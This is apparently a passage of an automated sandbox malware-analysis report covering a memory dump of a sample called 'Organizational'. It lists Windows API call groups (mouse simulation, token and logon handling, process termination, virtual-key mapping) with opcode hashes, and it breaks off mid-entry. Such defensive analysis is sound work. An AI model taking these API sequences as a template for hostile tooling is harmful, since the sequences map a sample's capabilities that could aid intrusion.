                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: dc1b90ab0138d0010f27115571cdff4906bb72be687f60774869df7f311fd57a
                                                    • Instruction ID: fc5aa52f63e22d5143d159c311a0b08a9b1e83bc5bd353dda967ae9585a9adb3
                                                    • Opcode Fuzzy Hash: dc1b90ab0138d0010f27115571cdff4906bb72be687f60774869df7f311fd57a
                                                    • Instruction Fuzzy Hash: A041AF31104309EFD710EF24DC88FBA7BE8EB85764F1406A9FA99972A1C7309805EB61
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00F6550C,?,?,00000000,00000001), ref: 00F67796
                                                      • Part of subcall function 00F6406C: GetWindowRect.USER32(?,?), ref: 00F6407F
                                                    • GetDesktopWindow.USER32 ref: 00F677C0
                                                    • GetWindowRect.USER32(00000000), ref: 00F677C7
                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F677F9
                                                      • Part of subcall function 00F557FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F55877
                                                    • GetCursorPos.USER32(?), ref: 00F67825
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F67883
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: 66dc501b104f617e2f543612b9ce0a017a3ee779e833ff53e55a25c074676624
                                                    • Instruction ID: 1773e911c3d323d226e98ad9889d7f6b5db3d57c63147d9de50ac62cd4c00fa9
                                                    • Opcode Fuzzy Hash: 66dc501b104f617e2f543612b9ce0a017a3ee779e833ff53e55a25c074676624
                                                    • Instruction Fuzzy Hash: 8131B072508309ABD720EF24DC49FABB7A9FF88714F100919F59997191DB34E908DBA2
                                                    APIs
                                                      • Part of subcall function 00F48CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F48CDE
                                                      • Part of subcall function 00F48CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F48CE8
                                                      • Part of subcall function 00F48CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F48CF7
                                                      • Part of subcall function 00F48CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F48CFE
                                                      • Part of subcall function 00F48CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F48D14
                                                    • GetLengthSid.ADVAPI32(?,00000000,00F4904D), ref: 00F49482
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F4948E
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F49495
                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F494AE
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00F4904D), ref: 00F494C2
                                                    • HeapFree.KERNEL32(00000000), ref: 00F494C9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                    • String ID:
                                                    • API String ID: 3008561057-0
                                                    • Opcode ID: 28af2974835b056ad58e1cf806b382bde2e65a1bfbd18c7238b46eec6dc21e80
                                                    • Instruction ID: 4fed96912b88a70a14a0f9be0c1274fe9441fb1134eda0a76d3486cfa1db5c55
                                                    • Opcode Fuzzy Hash: 28af2974835b056ad58e1cf806b382bde2e65a1bfbd18c7238b46eec6dc21e80
                                                    • Instruction Fuzzy Hash: D811AF32A05608EFDB50DFA4CC49BFF7BA9EB45325F508058EC4597260CB799905EB60
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F49200
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00F49207
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F49216
                                                    • CloseHandle.KERNEL32(00000004), ref: 00F49221
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F49250
                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F49264
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 03bf954ec50b0c319e0b09a4fc39818a87b4b63e62de7519eb94572dc61a44b1
                                                    • Instruction ID: ba98c8524a4653a9992c2b5be369d1d2eb7a36f983e00939275deba17347bdfc
                                                    • Opcode Fuzzy Hash: 03bf954ec50b0c319e0b09a4fc39818a87b4b63e62de7519eb94572dc61a44b1
                                                    • Instruction Fuzzy Hash: CC11597260520EBBDF418F94ED49FEE7BA9EF48314F044014FE04A2160D7B69E64EB60
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00F4C34E
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F4C35F
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F4C366
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00F4C36E
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F4C385
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 00F4C397
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 8a5a01f602a119b54e473a56bc1b312cb6552dc5d94ca61015641113dfaed070
                                                    • Instruction ID: 7590a860a79608f3ea3132b3b540e81ce4764a474bd6f1587324b349b9eafcd4
                                                    • Opcode Fuzzy Hash: 8a5a01f602a119b54e473a56bc1b312cb6552dc5d94ca61015641113dfaed070
                                                    • Instruction Fuzzy Hash: 59014875E01319BBDF505FA59C49A6EBFB8EF48761F004065FE04A7250DA709D14DF90
                                                    APIs
                                                      • Part of subcall function 00EF16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00EF1729
                                                      • Part of subcall function 00EF16CF: SelectObject.GDI32(?,00000000), ref: 00EF1738
                                                      • Part of subcall function 00EF16CF: BeginPath.GDI32(?), ref: 00EF174F
                                                      • Part of subcall function 00EF16CF: SelectObject.GDI32(?,00000000), ref: 00EF1778
                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F7C57C
                                                    • LineTo.GDI32(00000000,00000003,?), ref: 00F7C590
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F7C59E
                                                    • LineTo.GDI32(00000000,00000000,?), ref: 00F7C5AE
                                                    • EndPath.GDI32(00000000), ref: 00F7C5BE
                                                    • StrokePath.GDI32(00000000), ref: 00F7C5CE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: 08b65e22bca0fb5807e840679341d94702640975e763d2046389289a70a6c4ce
                                                    • Instruction ID: 0b64f4153ccb0b3ae948bb873961105636ca093385a1d629c78baddce1a4e870
                                                    • Opcode Fuzzy Hash: 08b65e22bca0fb5807e840679341d94702640975e763d2046389289a70a6c4ce
                                                    • Instruction Fuzzy Hash: 5B11CC7640410DBFDF129F90DC88EEA7FADEF04364F048155BA185A1A0D771AD59EBA0
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F107EC
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F107F4
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F107FF
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F1080A
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F10812
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1081A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: 929bf9e1c727372f44995652ab55c2530a4dbff37264da3bde72de4ba6b9d1d7
                                                    • Instruction ID: dda21fdf5d919ecb9232fb8cec6a45635b2e30a4347c5cb9817ffd475075c6b2
                                                    • Opcode Fuzzy Hash: 929bf9e1c727372f44995652ab55c2530a4dbff37264da3bde72de4ba6b9d1d7
                                                    • Instruction Fuzzy Hash: 92016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F559B4
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F559CA
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00F559D9
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F559E8
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F559F2
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F559F9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: 37ccab93f5c658b9bae5f61c29344ec06df0ca644c3e432e4c5dc504005c158b
                                                    • Instruction ID: 88d5c626d256945597f8b3d9c77b74b7860d1b2d1f48c732dc879c2f3773a497
                                                    • Opcode Fuzzy Hash: 37ccab93f5c658b9bae5f61c29344ec06df0ca644c3e432e4c5dc504005c158b
                                                    • Instruction Fuzzy Hash: D4F0903224055CBBE3615B929C0DEFF7B3CEFC6B21F400159FA0091050EBA01A15A7B5
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00F577FE
                                                    • EnterCriticalSection.KERNEL32(?,?,00EFC2B6,?,?), ref: 00F5780F
                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00EFC2B6,?,?), ref: 00F5781C
                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00EFC2B6,?,?), ref: 00F57829
                                                      • Part of subcall function 00F571F0: CloseHandle.KERNEL32(00000000,?,00F57836,?,00EFC2B6,?,?), ref: 00F571FA
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F5783C
                                                    • LeaveCriticalSection.KERNEL32(?,?,00EFC2B6,?,?), ref: 00F57843
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 068d2e608ec54031d747a757b9951c904c9743d8447e3f7acf6caa181f5b0dd3
                                                    • Instruction ID: 42b3695d7f8abb77005ae366aa6ff5d664f489ae869f233b33bcd7fd1327024d
                                                    • Opcode Fuzzy Hash: 068d2e608ec54031d747a757b9951c904c9743d8447e3f7acf6caa181f5b0dd3
                                                    • Instruction Fuzzy Hash: 1FF05E32545616ABD7912B64EC8CAFB772AFF45312B940421F602950A0CFB55809EB60
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F49555
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00F49561
                                                    • CloseHandle.KERNEL32(?), ref: 00F4956A
                                                    • CloseHandle.KERNEL32(?), ref: 00F49572
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F4957B
                                                    • HeapFree.KERNEL32(00000000), ref: 00F49582
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: 00a405d97f808a652a06a455942de6acbd597c6577ce1c5a1df5beb143c92ea1
                                                    • Instruction ID: d9e153c113a9c0f212b3d47c3b6a97d67d827fd7ff65c0b3d187ff06b8109d79
                                                    • Opcode Fuzzy Hash: 00a405d97f808a652a06a455942de6acbd597c6577ce1c5a1df5beb143c92ea1
                                                    • Instruction Fuzzy Hash: CEE07576104609BBDB811FE5EC0C9AABF79FF49722B904621F22591474CF32A469EB50
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00F68CFD
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F68E0C
                                                    • VariantClear.OLEAUT32(?), ref: 00F68F84
                                                      • Part of subcall function 00F57B1D: VariantInit.OLEAUT32(00000000), ref: 00F57B5D
                                                      • Part of subcall function 00F57B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00F57B66
                                                      • Part of subcall function 00F57B1D: VariantClear.OLEAUT32(00000000), ref: 00F57B72
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: d3069c18800a7b67b843c6be1a869ddb3b0fae6acb2ebbfb1c626d282f6c38ff
                                                    • Instruction ID: 686191d887c1508254d4c6b190fa9f21541bc0f2bafe683ae3ec2a8aeceb3370
                                                    • Opcode Fuzzy Hash: d3069c18800a7b67b843c6be1a869ddb3b0fae6acb2ebbfb1c626d282f6c38ff
                                                    • Instruction Fuzzy Hash: D8919F716083019FC710DF24C88096BBBF5EF99354F048A6EF9899B3A1DB31E946DB52
                                                    APIs
                                                      • Part of subcall function 00F0436A: _wcscpy.LIBCMT ref: 00F0438D
                                                    • _memset.LIBCMT ref: 00F5332E
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F5335D
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F53410
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F5343E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: 6290d2d504b1b2be976924374151b2bd355a4b0a9d5a322899ce668fb34a4d73
                                                    • Instruction ID: cf5f52c2fb07fa3d7db3ec0a5b26cd5d0f1aad1a89b08cc5e6d2aa32bcdd00a5
                                                    • Opcode Fuzzy Hash: 6290d2d504b1b2be976924374151b2bd355a4b0a9d5a322899ce668fb34a4d73
                                                    • Instruction Fuzzy Hash: BE51C031A083009BD716DA2CC84566BB7E8AF453A2F044A2DFE95931E1DB74DA48BB52
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F52F67
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F52F83
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00F52FC9
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FB7890,00000000), ref: 00F53012
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: 5b2b3a9067d97955ac94a01e69f12fa0099e6ce6e0f533ca4fa67b0f66429026
                                                    • Instruction ID: 8cf57637fe8cd09b69d22c7d085668e7f6d5d9b56cbd7811fdd993987ac5e365
                                                    • Opcode Fuzzy Hash: 5b2b3a9067d97955ac94a01e69f12fa0099e6ce6e0f533ca4fa67b0f66429026
                                                    • Instruction Fuzzy Hash: 144115316043419FD720DF28CC84B5ABBE4AF85365F04461DFE65972D1DB70EA09EB62
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F49ACC
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F49ADF
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F49B0F
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 365058703-1403004172
                                                    • Opcode ID: 290bfcb28db9939786e35a39d075d01f4ef1f35990c83df3604c8b870e507387
                                                    • Instruction ID: e8b4994039b3c031c9b5d223d4a0466c053a7ed30650dbb24603daa3af82b5d2
                                                    • Opcode Fuzzy Hash: 290bfcb28db9939786e35a39d075d01f4ef1f35990c83df3604c8b870e507387
                                                    • Instruction Fuzzy Hash: 6521E471E04104BEDB24ABA0DC46DFFBBA8EF85360F104119F825972D1DB784A49B620
                                                    APIs
                                                      • Part of subcall function 00EF2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EF214F
                                                      • Part of subcall function 00EF2111: GetStockObject.GDI32(00000011), ref: 00EF2163
                                                      • Part of subcall function 00EF2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EF216D
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F76A86
                                                    • LoadLibraryW.KERNEL32(?), ref: 00F76A8D
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F76AA2
                                                    • DestroyWindow.USER32(?), ref: 00F76AAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: f6294fa45708ef6ee68f48f39c236318475bca00a0838ef5171beb9a65e15881
                                                    • Instruction ID: 06ab863f0bd8dda7397374e6a725ee6a8205d9a848350cd10c8b1afbc8e06943
